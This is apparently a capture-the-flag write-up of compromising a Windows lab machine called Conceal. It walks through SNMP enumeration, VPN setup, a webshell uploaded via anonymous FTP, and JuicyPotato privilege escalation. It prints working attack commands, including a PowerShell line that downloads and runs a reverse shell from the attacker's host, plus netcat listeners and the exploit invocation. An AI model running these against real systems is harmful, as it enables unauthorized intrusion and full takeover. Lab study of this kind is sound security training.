# CONCEAL | 10.10.10.116

## Initial Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial 10.10.10.116
    sudo nmap -v -T4 -sU --top-ports 20 -sC -sV 10.10.10.116
    
### Open Ports and Their Services

Incredibly, there were no open TCP ports, which is a first for me. Well, I am currently scanning the entire range and the ET to completion is nearly 2 hours, so I did a UDP scan, as seen above.

* UDP 161 - SNMP
* UDP 500 - isakmp Microsoft Windows 8

## Services Enumeration

### UDP 161 - SNMP

The basic script scan in nmap gave me a LOT of information from this service - basically a list of the running programs, the OS version, and even a list of users on the box:

![](img/users.png)

There are a couple of entries referring to Windows Defender, so this box may be running Antivirus, which is good to know.

The scan also gives me a list of services listening and their ports:

![netstat](img/netstat.png)

It shows that services like SMB are indeed running, just that the ports are blocked from external access.

I went through a list of snmp enum tools (snmpenum, snmpcheck, onesixtyone, snmpscan) and none of those gave me any results. I finally used 'snmpwalk' when I realized it was available by default in my Arch install.

    snmpwalk -c public -v 1 10.10.10.116
    
It gave me the same kind of output as nmap, but very very verbosely. At the very beginning of the output was something interesting that the nmap scan did not see:

![](img/snmpwalk.png)

What looks like a password for a VPN - which brings us to the next open UDP port.

### UDP 500 - isakmp

This is a port used by VPNs but I am not sure for what exactly, or how to exploit the fact that I have the PSK for it. The PSK looks like a hash so let's put it [online](https://crackstation.net/) and see if it is already known:

![](img/pass.png)

So it is an NTLM hash, and the password is 'Dudecake1!'. Good to know.

The first result for "ike vpn" in Google tells me that IKE stands for Internet Key Exchange, and has to do with setting up IPsec in VPNs. I can use the 'ike-scan' tool to further enumerate this port.

    sudo ike-scan -M 10.10.10.116
    
This gives me more info about the service, including the type of encryption used and sometimes the version of IKE being used.

## Connecting to the VPN

I'm taking this one as a learning experience, since I don't know how to configure this type of VPN connection (IPsec). I googled "IKE enumeration" and was taken to [this](https://infinitelogins.com/2020/12/08/enumerating-ipsec-ike-isakmp-ports-500-4500-etc/) helpful post (but it contains spoilers for this very box) and it walked me through the process of connecting to the VPN for this specific machine.

After installing 'strongswan' I followed the config instructions. All that was left to do was to attempt to connect:

    sudo ipsec start --nofork
    
After a bit of trial and error, I think I have it working. Now I have to redo an nmap scan, but with slightly different parameters (have to use -sT):

    sudo nmap -v -T4 -sT -sV -sC -oN nmap-vpn 10.10.10.116
    
And suddenly there are a bunch of TCP ports open to us:

* 21 - FTP - Microsoft ftpd
* 80 - HTTP - Microsoft IIS httpd 10.0
* 135 - msrpc
* 139/445 - SMB

### 21 - FTP

The nmap scan told me that anonymous access is allowed, so let's go check it out.

I find that there is nothing visible, but I learn it is the root directory. Not only that, but I have write access and can access files through the web browser too!

![](img/hello.png)

I uploaded a webshell but it won't execute - it is only visible on the ftp side - on http it 404s. Gonna move on to enumerating port 80 next.

### 80 - HTTP

There is a default IIS page here:

![](img/vpn-port-80.png)

Time to find any directories using gobuster.

![](img/upload.png)

Turns out, this is the way to access files that are uploaded by FTP:

![](img/upload-hello.png)

Excitedly I clicked on the webshell.aspx, expecting the simple webshell to greet me:

![](img/error.png)

Alas, it won't be that easy. Perhaps ASP.NET is not actually installed on the machine. Hold on, lemme try with an even simpler webshell that I just used the other day:

![](img/webshell2.png)

This one worked! I had to change the extension from .aspx to .asp but I have code execution!

![](img/whoami.png)

Let's do our due diligence with the other open ports.

### 135 - MSRPC

I tried for a null session and it did not work. Then I tried with the username 'destitute' that I grabbed from the previous code execution, and a blank password, then the VPN password - could not get access.

### 139/445 - SMB

Tried the same things as with MSRPC to no avail. That's ok. I think I have a way to gain a foothold via the webshell.

## Foothold via command execution in webshell

I just have to modify my simple webshell script to download and execute a reverse shell. I noticed that the files are getting deleted periodically so the best option here is to use a powershell command and the Invoke-PowerShellTCP script. That way the command downloads and executes it immediately - no file on the webserver.

![](img/webshell.png)

Now I will start a python webserver to serve up the reverse shell script, and spin up a netcat listener:

    python -m http.server 8000
    nc -nvvlp 6969

And it worked, first try!

![](img/user-shell.png)

### Flag

![](img/user-flag.png)

## User Enumeration

This is actually a Windows 10 machine, even though previous enumeration told me it was Windows 8. It is also unpatched, so I may have a privesc with a kernel exploit.

Additionally, the destitute user has 'SeImpersonatePrivilege' enabled, so some kind of potato attack may be possible.

There is a powershell script in a directory called 'admin_checks' at the root of the filesystem, but it turns out this is the script that deletes whatever is in the /upload folder, so this is a dead end.

Let's try the most obvious solution - JuicyPotato.

## Privilege Escalation via JuicyPotato exploit

If your user has 'SeImpersonatePrivilege' enabled, there is a good chance that you can privesc with this exploit. It does not work on all Windows versions, but it does work on this one.

This time it took me quite a while to ge this to work. When you choose a CLSID, you can get an error message, which means that you chose the wrong one. But sometimes it says it succeeds but you don't get a shell back. If that happens all you need to do is try another CLSID.

Step one is to create a simple .bat file that contains your command; this avoids the pitfalls of improper quoting etc etc. Mine just has the powershell command to download + execute another one of those Invoke-PowerShell scripts:

    powershell.exe -c iex(new object net.webclient).downloadString('http://10.10.14.20:8000/koopa.ps1')
    
I have to upload this .bat file, as well as the JuicyPotato exe, to the victim machine. I used SMB for this. On my machine:

    sudo smbserver.py -smb2support secure .
    
On the victim machine:

    copy \\10.10.14.20\secure\[filename] .
    
Then I need to start a simple server to serve up the reverse shell file:

    python -m http.server 8000
    
And spin up a netcat listener like before:

    nc -nvvlp 9999
    
Finally, comes the moment of truth. This is where I had trouble with selecting the correct CLSID, and getting frustrated when there were no errors but I didn't get a connect back. Then I just decided to go through the list of CLSIDs (found [here](https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_10_Enterprise)) until it eventually worked.

    ./jp.exe -t * -l 9001 -p c:\users\public\rev.bat -c "{8BC3F05E-D86B-11D0-A075-00C04FB68820}"
    
A couple of seconds later and I was root:

![](img/root-shell.png)

### Flag

![](img/root-flag.png)

## Conclusion

Gotta admit I had no clue whatsoever about how to deal with the VPN situation. Other than that part the rest was pretty standard. But now I have some experience under my belt if a similar situation presents itself in the future.

Steps taken:

* Scan UDP ports, discover 2 open ones
* Use snmpwalk to find hidden hash for VPN
* Connect to VPN using credentials
* Enumerate now open TCP ports
* Find upload dir on webpage
* Upload webshell via open FTP server, execute via webpage, get shell
* User has SeImpersonatePrivilege
* Privesc via JuicyPotato attack, get shell
